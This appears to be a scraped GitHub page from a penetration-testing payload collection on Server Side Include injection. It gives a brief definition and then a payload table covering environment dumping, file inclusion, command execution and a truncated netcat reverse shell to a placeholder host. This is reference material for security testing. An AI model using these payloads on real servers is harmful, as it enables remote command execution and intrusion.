Skip to content

Latest commit

 

History

History
 
 

Server Side Include Injection

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
 
 

Server Side Include Injection

Server Side Includes (SSI) are directives that are placed in HTML pages and evaluated on the server while the pages are being served. They let you add dynamically generated content to an existing HTML page, without having to serve the entire page via a CGI program, or other dynamic technology.

Summary

Payloads

Description Payload
Print a date <!--#echo var="DATE_LOCAL" -->
Print all the variables <!--#printenv -->
Include a file <!--#include file="includefile.html" -->
Execute commands <!--#exec cmd="ls" -->
Doing a reverse shell `<!--#exec cmd="mkfifo /tmp/foo;nc IP PORT 0</tmp/foo

References